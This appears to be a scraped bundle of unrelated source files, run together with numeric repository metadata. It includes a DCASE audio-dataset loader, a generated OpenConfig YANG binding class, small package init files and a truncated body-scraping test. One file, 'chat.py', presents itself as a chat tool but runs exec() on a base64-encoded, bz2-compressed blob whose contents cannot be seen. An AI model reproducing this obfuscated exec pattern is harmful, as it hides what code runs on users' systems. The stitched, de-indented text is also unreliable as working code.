"""DCASE 2013 Sound event detection, evaluation dataset
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='DCASE2013-event-challenge')
self.authors = 'Dimitrios Giannoulis, Emmanouil Benetos, Dan Stowell, and Mark Plumbley'
self.name_remote = 'IEEE AASP CASA Challenge - Private Dataset for Event Detection Task'
self.url = 'http://www.elec.qmul.ac.uk/digitalmusic/sceneseventschallenge/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Unknown'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 5
self.package_list = [
{
'remote_package': 'https://archive.org/download/dcase2013_event_detection_testset_OS/dcase2013_event_detection_testset_OS.zip',
'local_package': os.path.join(self.local_path, 'dcase2013_event_detection_testset_OS.zip'),
'local_audio_path': os.path.join(self.local_path, 'dcase2013_event_detection_testset_OS'),
}
]
def on_after_extract(self):
# Make legacy dataset compatible with DCASE2016 dataset scheme
scene_label = 'office'
if not os.path.isfile(self.meta_file):
meta_file_handle = open(self.meta_file, 'wt')
try:
writer = csv.writer(meta_file_handle, delimiter='\t')
for file in self.audio_files:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
base_filename, file_extension = os.path.splitext(raw_filename)
if file.find('dcase2013_event_detection_testset_OS') != -1:
annotation_filename = os.path.join(self.local_path, 'dcase2013_event_detection_testset_OS',base_filename + '_v2.txt')
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename), scene_label,
annotation_file_row[0], annotation_file_row[1],
annotation_file_row[2], 'm'))
finally:
annotation_file_handle.close()
else:
annotation_filename = os.path.join(self.local_path, 'dcase2013_event_detection_testset_OS',base_filename + '.txt')
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename), scene_label,
annotation_file_row[0], annotation_file_row[1],
annotation_file_row[2], 'm'))
finally:
annotation_file_handle.close()
finally:
meta_file_handle.close()
all_folds_found = True
for fold in xrange(1, self.evaluation_folds):
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt')):
all_folds_found = False
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt')):
all_folds_found = False
if not all_folds_found:
# Construct training and testing sets. Isolated sounds are used for training and
# polyphonic mixtures are used for testing.
if not os.path.isdir(self.evaluation_setup_path):
os.makedirs(self.evaluation_setup_path)
files = []
for item in self.meta:
if item['file'] not in files:
files.append(item['file'])
files = numpy.array(files)
f = numpy.zeros(len(files))
sss = StratifiedShuffleSplit(y=f, n_iter=5, test_size=0.3, random_state=0)
fold = 1
for train_index, test_index in sss:
# print("TRAIN:", train_index, "TEST:", test_index)
train_files = files[train_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in train_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
for item in self.meta:
if item['file'] == file:
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],
item['event_onset'], item['event_offset'], item['event_label']])
test_files = files[test_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
writer.writerow([os.path.join(relative_path, raw_filename)])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
for item in self.meta:
if item['file'] == file:
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],
item['event_onset'], item['event_offset'], item['event_label']])
fold += 1
| 39.71074 | 163 | 0.522395 | 8,385 | 78,389 | 4.681932 | 0.060942 | 0.034388 | 0.033878 | 0.036018 | 0.789673 | 0.763717 | 0.739238 | 0.728387 | 0.719599 | 0.699322 | 0 | 0.01357 | 0.368266 | 78,389 | 1,973 | 164 | 39.730867 | 0.779185 | 0.031943 | 0 | 0.625518 | 0 | 0.011599 | 0.138193 | 0.017868 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.000829 | 0.008285 | null | null | 0.004143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5d7d8c710d666b61c16e2e5105bdd7aa82be3827 | 47 | py | Python | dialogy/workflow/__init__.py | ayush-1506/dialogy | 2f688ad30ed14f220eb8ae1a7b82fbe04ad2edbf | [
"MIT"
] | 13 | 2021-09-09T15:18:08.000Z | 2022-03-15T10:02:59.000Z | dialogy/workflow/__init__.py | ayush-1506/dialogy | 2f688ad30ed14f220eb8ae1a7b82fbe04ad2edbf | [
"MIT"
] | 48 | 2021-01-14T21:06:28.000Z | 2021-08-30T07:23:51.000Z | dialogy/workflow/__init__.py | ayush-1506/dialogy | 2f688ad30ed14f220eb8ae1a7b82fbe04ad2edbf | [
"MIT"
] | 4 | 2021-01-18T11:19:49.000Z | 2021-08-06T05:52:17.000Z | from dialogy.workflow.workflow import Workflow
| 23.5 | 46 | 0.87234 | 6 | 47 | 6.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 47 | 1 | 47 | 47 | 0.953488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5d7e1a706e3cc8d6412a019148304a83b1796563 | 65 | py | Python | pocportal/graphqlbase.py | Jumpscale/poc-portal | 6ddd7e004a588f9c6a5b72224b8713ebdff85691 | [
"Apache-2.0"
] | null | null | null | pocportal/graphqlbase.py | Jumpscale/poc-portal | 6ddd7e004a588f9c6a5b72224b8713ebdff85691 | [
"Apache-2.0"
] | 1 | 2017-10-03T13:46:03.000Z | 2020-06-17T14:19:50.000Z | pocportal/graphqlbase.py | Jumpscale/poc-portal | 6ddd7e004a588f9c6a5b72224b8713ebdff85691 | [
"Apache-2.0"
] | null | null | null | import graphene
class BaseQuery(graphene.ObjectType):
pass
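# Illustrative sketch only (not part of the original module, names are made up):
# concrete schemas are expected to extend BaseQuery with graphene fields, e.g.
#
#   class Query(BaseQuery):
#       hello = graphene.String()
#
#       def resolve_hello(self, info):
#           return 'world'
#
#   schema = graphene.Schema(query=Query)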
| 10.833333 | 37 | 0.769231 | 7 | 65 | 7.142857 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169231 | 65 | 5 | 38 | 13 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
5d864663b2439d30159ed2a567d4eeb70176df85 | 17,790 | py | Python | napalm_yang/models/openconfig/system/config/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | [
"Apache-2.0"
] | 64 | 2016-10-20T15:47:18.000Z | 2021-11-11T11:57:32.000Z | napalm_yang/models/openconfig/system/config/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | [
"Apache-2.0"
] | 126 | 2016-10-05T10:36:14.000Z | 2019-05-15T08:43:23.000Z | napalm_yang/models/openconfig/system/config/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | [
"Apache-2.0"
] | 63 | 2016-11-07T15:23:08.000Z | 2021-09-22T14:41:16.000Z | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-system - based on the path /system/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Global configuration data for the system
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__hostname",
"__domain_name",
"__login_banner",
"__motd_banner",
)
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__hostname = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="hostname",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
self.__domain_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="domain-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
self.__login_banner = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="login-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
self.__motd_banner = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="motd-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return ["system", "config"]
def _get_hostname(self):
"""
Getter method for hostname, mapped from YANG variable /system/config/hostname (inet:domain-name)
YANG Description: The hostname of the device -- should be a single domain
label, without the domain.
"""
return self.__hostname
def _set_hostname(self, v, load=False):
"""
Setter method for hostname, mapped from YANG variable /system/config/hostname (inet:domain-name)
If this variable is read-only (config: false) in the
source YANG file, then _set_hostname is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hostname() directly.
YANG Description: The hostname of the device -- should be a single domain
label, without the domain.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="hostname",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """hostname must be of a type compatible with inet:domain-name""",
"defined-type": "inet:domain-name",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.', 'length': ['1..253']}), is_leaf=True, yang_name="hostname", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='inet:domain-name', is_config=True)""",
}
)
self.__hostname = t
if hasattr(self, "_set"):
self._set()
def _unset_hostname(self):
self.__hostname = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="hostname",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
def _get_domain_name(self):
"""
Getter method for domain_name, mapped from YANG variable /system/config/domain_name (inet:domain-name)
YANG Description: Specifies the domain name used to form fully qualified name
for unqualified hostnames.
"""
return self.__domain_name
def _set_domain_name(self, v, load=False):
"""
Setter method for domain_name, mapped from YANG variable /system/config/domain_name (inet:domain-name)
If this variable is read-only (config: false) in the
source YANG file, then _set_domain_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_domain_name() directly.
YANG Description: Specifies the domain name used to form fully qualified name
for unqualified hostnames.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="domain-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """domain_name must be of a type compatible with inet:domain-name""",
"defined-type": "inet:domain-name",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.', 'length': ['1..253']}), is_leaf=True, yang_name="domain-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='inet:domain-name', is_config=True)""",
}
)
self.__domain_name = t
if hasattr(self, "_set"):
self._set()
def _unset_domain_name(self):
self.__domain_name = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.)*([a-zA-Z0-9_]([a-zA-Z0-9\\-_]){0,61})?[a-zA-Z0-9]\\.?)|\\.",
"length": ["1..253"],
},
),
is_leaf=True,
yang_name="domain-name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="inet:domain-name",
is_config=True,
)
def _get_login_banner(self):
"""
Getter method for login_banner, mapped from YANG variable /system/config/login_banner (string)
YANG Description: The console login message displayed before the login prompt,
i.e., before a user logs into the system.
"""
return self.__login_banner
def _set_login_banner(self, v, load=False):
"""
Setter method for login_banner, mapped from YANG variable /system/config/login_banner (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_login_banner is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_login_banner() directly.
YANG Description: The console login message displayed before the login prompt,
i.e., before a user logs into the system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="login-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """login_banner must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="login-banner", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='string', is_config=True)""",
}
)
self.__login_banner = t
if hasattr(self, "_set"):
self._set()
def _unset_login_banner(self):
self.__login_banner = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="login-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
def _get_motd_banner(self):
"""
Getter method for motd_banner, mapped from YANG variable /system/config/motd_banner (string)
YANG Description: The console message displayed after a user logs into the
system. The system may append additional standard
information such as the current system date and time, uptime,
last login timestamp, etc.
"""
return self.__motd_banner
def _set_motd_banner(self, v, load=False):
"""
Setter method for motd_banner, mapped from YANG variable /system/config/motd_banner (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_motd_banner is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_motd_banner() directly.
YANG Description: The console message displayed after a user logs into the
system. The system may append additional standard
information such as the current system date and time, uptime,
last login timestamp, etc.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="motd-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """motd_banner must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="motd-banner", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/system', defining_module='openconfig-system', yang_type='string', is_config=True)""",
}
)
self.__motd_banner = t
if hasattr(self, "_set"):
self._set()
def _unset_motd_banner(self):
self.__motd_banner = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="motd-banner",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/system",
defining_module="openconfig-system",
yang_type="string",
is_config=True,
)
hostname = __builtin__.property(_get_hostname, _set_hostname)
domain_name = __builtin__.property(_get_domain_name, _set_domain_name)
login_banner = __builtin__.property(_get_login_banner, _set_login_banner)
motd_banner = __builtin__.property(_get_motd_banner, _set_motd_banner)
_pyangbind_elements = OrderedDict(
[
("hostname", hostname),
("domain_name", domain_name),
("login_banner", login_banner),
("motd_banner", motd_banner),
]
)
| 39.977528 | 541 | 0.572625 | 2,023 | 17,790 | 4.809689 | 0.106772 | 0.0148 | 0.024666 | 0.029599 | 0.811511 | 0.780781 | 0.77184 | 0.767729 | 0.762384 | 0.755807 | 0 | 0.01514 | 0.305734 | 17,790 | 444 | 542 | 40.067568 | 0.77265 | 0.187521 | 0 | 0.635015 | 0 | 0.029674 | 0.273618 | 0.117483 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041543 | false | 0 | 0.04451 | 0 | 0.130564 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5d9a2539f53debec82909f71bd03be2744ae202d | 278 | py | Python | bin/bin/programs/chat.py | lukgth/poshy | e10d3b34648db4aa32a5697b59a03020fc677655 | [
"Apache-2.0"
] | null | null | null | bin/bin/programs/chat.py | lukgth/poshy | e10d3b34648db4aa32a5697b59a03020fc677655 | [
"Apache-2.0"
] | null | null | null | bin/bin/programs/chat.py | lukgth/poshy | e10d3b34648db4aa32a5697b59a03020fc677655 | [
"Apache-2.0"
] | null | null | null | # chat with other system users
import bz2, base64
print('Type `chat` to chat with somebody else on your system!')
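# The next line decodes the base64 payload, decompresses it with bz2 and executes
# the embedded script.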
exec(bz2.decompress(base64.b64decode('QlpoOTFBWSZTWdPB9nwAAA5bgAAQQOAAEgSAMmfegCAAQRT2o0jyaQGZQoNGjQZAaJfO+krzQldsEHdTNI89EvacwwLtZqMUtqBLGZX/F3JFOFCQ08H2fA==')))
| 46.333333 | 162 | 0.841727 | 27 | 278 | 8.666667 | 0.777778 | 0.068376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070039 | 0.07554 | 278 | 5 | 163 | 55.6 | 0.840467 | 0.100719 | 0 | 0 | 0 | 0 | 0.701613 | 0.483871 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
5da3450022c0a0dc2675ad27b1e6fe3abc9d1ef1 | 209 | py | Python | alignmentrs/aln/__init__.py | kentwait/alignmentrs | ab4ed6bae7ad0f7961104baf914bb6b49dc28d88 | [
"MIT"
] | 1 | 2019-07-10T00:14:44.000Z | 2019-07-10T00:14:44.000Z | alignmentrs/aln/__init__.py | kentwait/alignmentrs | ab4ed6bae7ad0f7961104baf914bb6b49dc28d88 | [
"MIT"
] | 1 | 2019-02-12T07:01:32.000Z | 2019-02-12T07:01:32.000Z | alignmentrs/aln/__init__.py | kentwait/alignmentrs | ab4ed6bae7ad0f7961104baf914bb6b49dc28d88 | [
"MIT"
] | 3 | 2019-01-30T17:51:44.000Z | 2019-09-11T07:36:49.000Z | from alignmentrs.aln.classes import Alignment, CatAlignment
from alignmentrs.aln.funcs import fasta_file_to_alignment
__all__ = ['Alignment', 'CatAlignment',
'fasta_file_to_alignment',
]
| 29.857143 | 59 | 0.741627 | 23 | 209 | 6.304348 | 0.521739 | 0.206897 | 0.248276 | 0.275862 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 209 | 6 | 60 | 34.833333 | 0.847953 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 0.110048 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
5dc1faac333b06065ebe8e7da092302a3979b798 | 384 | py | Python | pycerberus/validators/__init__.py | FelixSchwarz/pycerberus | d38376a52e61516023a3de61d43ef3d225161c7e | [
"MIT"
] | null | null | null | pycerberus/validators/__init__.py | FelixSchwarz/pycerberus | d38376a52e61516023a3de61d43ef3d225161c7e | [
"MIT"
] | 4 | 2018-10-21T16:00:59.000Z | 2019-09-14T21:05:32.000Z | pycerberus/validators/__init__.py | FelixSchwarz/pycerberus | d38376a52e61516023a3de61d43ef3d225161c7e | [
"MIT"
] | null | null | null |
from pycerberus.validators.basic_numbers import *
from pycerberus.validators.checkbox import *
from pycerberus.validators.domain import *
from pycerberus.validators.foreach import *
from pycerberus.validators.email import *
from pycerberus.validators.matching_fields import *
from pycerberus.validators.oneof import *
from .regex import *
from pycerberus.validators.string import *
| 32 | 51 | 0.833333 | 45 | 384 | 7.066667 | 0.333333 | 0.352201 | 0.603774 | 0.660377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098958 | 384 | 11 | 52 | 34.909091 | 0.919075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f8de9071e412cda1c59b4ab3ecf25d9c43c131d9 | 11,099 | py | Python | tests/test_load_body.py | jfunez/articles_meta | 70cb33363cd6862f3859ae2606f8db2e669d32d1 | [
"BSD-2-Clause"
] | null | null | null | tests/test_load_body.py | jfunez/articles_meta | 70cb33363cd6862f3859ae2606f8db2e669d32d1 | [
"BSD-2-Clause"
] | null | null | null | tests/test_load_body.py | jfunez/articles_meta | 70cb33363cd6862f3859ae2606f8db2e669d32d1 | [
"BSD-2-Clause"
] | null | null | null | # coding: utf-8
import unittest
import os
import codecs
from processing import load_body
class LoadLicensesTest(unittest.TestCase):
def test_scrapt_body(self):
data = u"""<html><header></header><body><div class="content"><div class="index,en"><div class="title">Crazy <i>Title</i></div><p>Crazy Body</p><p>Really Crazy Body</p></div></div></body></html>"""
result = load_body.scrap_body(data, 'en')
self.assertEqual(result, '<div class="title">Crazy <i>Title</i></div><p>Crazy Body</p><p>Really Crazy Body</p>')
def test_regex_remove_links1(self):
import re
data = """<p>ref 1: [ <a href="javascript:void(0);" onclick="javascript: window.open('/scielo.php?script=sci_nlinks&ref=000129&pid=S0001-3765200400030001400030&lng=pt','','width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,');">Links</a> ]</p><p>ref 2: [ <a href="javascript:void(0);" onclick="javascript: window.open('/scielo.php?script=sci_nlinks&ref=000129&pid=S0001-3765200400030001400030&lng=pt','','width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,');">Links</a> ]</p>"""
result = load_body.REMOVE_LINKS_REGEX.sub(' ', data, count=0)
self.assertEqual(result, '<p>ref 1: </p><p>ref 2: </p>')
def test_regex_remove_links2(self):
import re
data = ' '.join([i.strip() for i in codecs.open(os.path.dirname(__file__)+'/fixtures/body_removed_links_2.html', 'r', encoding='utf-8').readlines()])
result = load_body.REMOVE_LINKS_REGEX.findall(data)
expected = [
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000172&pid=S0044-5967200900010001500001&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000174&pid=S0044-5967200900010001500002&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000176&pid=S0044-5967200900010001500003&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
u'[ <a href="javascript:void(0);" onclick="javascript: window.open(\'/scielo.php?script=sci_nlinks&ref=000178&pid=S0044-5967200900010001500004&lng=en\',\'\',\'width=640,height=500,resizable=yes,scrollbars=1,menubar=yes,\');">Links</a> ]',
